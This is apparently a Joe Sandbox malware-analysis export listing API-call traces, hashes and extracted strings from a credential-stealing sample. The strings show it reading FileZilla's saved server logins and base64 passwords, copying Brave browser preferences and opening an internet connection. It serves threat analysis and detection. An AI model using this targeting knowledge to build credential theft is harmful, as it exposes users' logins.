                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F71A1A
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F71A25
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71A4C
                                    • lstrlen.KERNEL32(00F91794), ref: 00F71A5E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71A80
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F71A8C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71AB4
                                    • lstrlen.KERNEL32(?), ref: 00F71AC8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71AE5
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F71AF3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71B19
                                    • lstrlen.KERNEL32(00A99288), ref: 00F71B2F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71B59
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F71B64
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71B8F
                                    • lstrlen.KERNEL32(00F91794), ref: 00F71BA1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71BC3
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F71BCF
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71BF8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71C25
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F71C30
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71C57
                                    • lstrlen.KERNEL32(00F91794), ref: 00F71C69
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71C8B
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F71C97
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71CC0
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71CEF
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F71CFA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71D21
                                    • lstrlen.KERNEL32(00F91794), ref: 00F71D33
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71D55
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F71D61
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71D8A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71DB9
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F71DC4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71DED
                                    • lstrlen.KERNEL32(00F91794), ref: 00F71E19
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71E36
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F71E42
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71E68
                                    • lstrlen.KERNEL32(00A9CFB0), ref: 00F71E7E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71EB2
                                    • lstrlen.KERNEL32(00F91794), ref: 00F71EC6
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71EE3
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F71EEF
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71F15
                                    • lstrlen.KERNEL32(00A9DB90), ref: 00F71F2B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71F5F
                                    • lstrlen.KERNEL32(00F91794), ref: 00F71F73
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71F90
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F71F9C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71FC2
                                    • lstrlen.KERNEL32(00A8BA40), ref: 00F71FD8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F72000
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F7200B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F72036
                                    • lstrlen.KERNEL32(00F91794), ref: 00F72048
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F72067
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F72073
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F72098
                                    • lstrlen.KERNEL32(?), ref: 00F720AC
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F720D0
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F720DE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F72103
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F7213F
                                    • lstrlen.KERNEL32(00A9CF08), ref: 00F7214E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F72176
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F72181
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                                    • String ID: \*.*
                                    • API String ID: 712834838-1173974218
                                    • Opcode ID: dcb7fa3508c6ecaf9e0ab122c0e46f7b573239616f92330ade5533f140c946af
                                    • Instruction ID: 3feba693fdfa093bd8d37d5eb1d37067e07bb3c69852f66d3ee23ee3773f1de4
                                    • Opcode Fuzzy Hash: dcb7fa3508c6ecaf9e0ab122c0e46f7b573239616f92330ade5533f140c946af
                                    • Instruction Fuzzy Hash: AF62E93090161A9BCB31EFA8CD49AAF77B9BF44710F044039F82993245DB78DD45EBA2
                                    Function 00F73910 Relevance: 144.4, APIs: 81, Strings: 1, Instructions: 869stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 00F7392C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00F73943
                                    • StrCmpCA.SHLWAPI(?,00F917A0), ref: 00F7396C
                                    • StrCmpCA.SHLWAPI(?,00F917A4), ref: 00F73986
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F739BF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F739E7
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F739F2
                                    • lstrlen.KERNEL32(00F91794), ref: 00F739FD
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73A1A
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F73A26
                                    • lstrlen.KERNEL32(?), ref: 00F73A33
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73A53
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F73A61
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73A8A
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F73ACE
                                    • lstrlen.KERNEL32(?), ref: 00F73AD8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73B05
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F73B10
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73B36
                                    • lstrlen.KERNEL32(00F91794), ref: 00F73B48
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73B6A
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F73B76
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73B9E
                                    • lstrlen.KERNEL32(?), ref: 00F73BB2
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73BD2
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F73BE0
                                    • lstrlen.KERNEL32(00A99108), ref: 00F73C0B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73C31
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F73C3C
                                    • lstrlen.KERNEL32(00A99288), ref: 00F73C5E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73C84
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F73C8F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73CB7
                                    • lstrlen.KERNEL32(00F91794), ref: 00F73CC9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73CE8
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F73CF4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73D1A
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F73D47
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F73D52
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73D79
                                    • lstrlen.KERNEL32(00F91794), ref: 00F73D8B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73DAD
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F73DB9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73DE2
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73E11
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F73E1C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73E43
                                    • lstrlen.KERNEL32(00F91794), ref: 00F73E55
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73E77
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F73E83
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73EAC
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73EDB
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F73EE6
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73F0D
                                    • lstrlen.KERNEL32(00F91794), ref: 00F73F1F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73F41
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F73F4D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73F75
                                    • lstrlen.KERNEL32(?), ref: 00F73F89
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73FA9
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F73FB7
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73FE0
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F7401F
                                    • lstrlen.KERNEL32(00A9CF08), ref: 00F7402E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F74056
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F74061
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7408A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F740CE
                                    • lstrcat.KERNEL32(00000000), ref: 00F740DB
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 00F742D9
                                    • FindClose.KERNEL32(00000000), ref: 00F742E8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\*.*
                                    • API String ID: 1006159827-1013718255
                                    • Opcode ID: 451bb54e85ae50e7ce9283122bd777881f5c55d3a9dd5abee62b7c82afa729f3
                                    • Instruction ID: ad9c3ff41171df0905e842edee8f4c2dcafe20f223325cddf4cf1a1686a0529e
                                    • Opcode Fuzzy Hash: 451bb54e85ae50e7ce9283122bd777881f5c55d3a9dd5abee62b7c82afa729f3
                                    • Instruction Fuzzy Hash: AA62C871D1161AABCB35AFA4CC49AAE77B9BF44314F048139F82993244DB38DD41FB92
                                    Function 00F76960 Relevance: 144.3, APIs: 72, Strings: 10, Instructions: 763stringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F76995
                                    • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00F769C8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F76A02
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F76A29
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F76A34
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F76A5D
                                    • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 00F76A77
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F76A99
                                    • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 00F76AA5
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F76AD0
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F76B00
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00F76B35
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F76B9D
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F76BCD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 313953988-555421843
                                    • Opcode ID: 65a33d4ccb9d7cad2695fdf215560a1eeae4dc1ed5daa8ca3f6253611d06a15a
                                    • Instruction ID: a518fa8148687a0d07dd6548a2144c1c532d142385aac4f02a3c6cd0bb355c18
                                    • Opcode Fuzzy Hash: 65a33d4ccb9d7cad2695fdf215560a1eeae4dc1ed5daa8ca3f6253611d06a15a
                                    • Instruction Fuzzy Hash: 5E421870E11605AFDB21EBB0DC89EAE7779AF44314F088429F525E7241DB78DC41EBA2
                                    Function 00F6DB99 Relevance: 125.0, APIs: 68, Strings: 3, Instructions: 763stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F6DBC1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DBE4
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F6DBEF
                                    • lstrlen.KERNEL32(00F94CA8), ref: 00F6DBFA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DC17
                                    • lstrcat.KERNEL32(00000000,00F94CA8), ref: 00F6DC23
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DC4C
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F6DC8F
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F6DCBF
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 00F6DCD0
                                    • StrCmpCA.SHLWAPI(?,00F917A0), ref: 00F6DCF0
                                    • StrCmpCA.SHLWAPI(?,00F917A4), ref: 00F6DD0A
                                    • lstrlen.KERNEL32(00F8CFEC), ref: 00F6DD1D
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F6DD47
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DD70
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F6DD7B
                                    • lstrlen.KERNEL32(00F91794), ref: 00F6DD86
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DDA3
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F6DDAF
                                    • lstrlen.KERNEL32(?), ref: 00F6DDBC
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DDDF
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F6DDED
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DE19
                                    • lstrlen.KERNEL32(00F91794), ref: 00F6DE3D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6DE6F
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F6DE7B
                                    • lstrlen.KERNEL32(00A98F68), ref: 00F6DE8A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DEB0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F6DEBB
                                    • lstrlen.KERNEL32(00F91794), ref: 00F6DEC6
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6DEE6
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F6DEF2
                                    • lstrlen.KERNEL32(00A991B8), ref: 00F6DF01
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DF27
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F6DF32
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DF5E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DFA5
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F6DFB1
                                    • lstrlen.KERNEL32(00A98F68), ref: 00F6DFC0
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DFE9
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F6DFF4
                                    • lstrlen.KERNEL32(00F91794), ref: 00F6DFFF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6E022
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F6E02E
                                    • lstrlen.KERNEL32(00A991B8), ref: 00F6E03D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6E063
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F6E06E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6E09A
                                    • StrCmpCA.SHLWAPI(?,Brave), ref: 00F6E0CD
                                    • StrCmpCA.SHLWAPI(?,Preferences), ref: 00F6E0E7
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F6E11F
                                    • lstrlen.KERNEL32(00A9CF08), ref: 00F6E12E
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6E155
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F6E15D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6E19F
                                    • lstrcat.KERNEL32(00000000), ref: 00F6E1A9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6E1D0
                                    • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00F6E1F9
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F6E22F
                                    • lstrlen.KERNEL32(00A99108), ref: 00F6E23D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6E261
                                    • lstrcat.KERNEL32(00000000,00A99108), ref: 00F6E269
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 00F6E988
                                    • FindClose.KERNEL32(00000000), ref: 00F6E997
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                                    • String ID: Brave$Preferences$\Brave\Preferences
                                    • API String ID: 1346089424-1230934161
                                    • Opcode ID: 31aa6c924176015dda4e488e39312373f0287c4d1c8b8eaadb94a9cde35333cc
                                    • Instruction ID: 912d5e6604f8ff5f4eaaeb2b58a0381165ae0fccdd1c60352d5e5e919d6abc7c
                                    • Opcode Fuzzy Hash: 31aa6c924176015dda4e488e39312373f0287c4d1c8b8eaadb94a9cde35333cc
                                    • Instruction Fuzzy Hash: E2529071E1160A9BDB25EFB4DD89AAE77B9AF44314F084038F825D7245DB38DC41EBA0
                                    Function 00F660D0 Relevance: 119.8, APIs: 66, Strings: 2, Instructions: 818stringnetworkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F660FF
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F66152
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F66185
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F661B5
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F661F0
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F66223
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00F66233
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$InternetOpen
                                    • String ID: "$------
                                    • API String ID: 2041821634-2370822465
                                    • Opcode ID: 57970d5b1fcdafa98da3c6e35d09a6eeba2ecece79241adc95f482d324318bf2
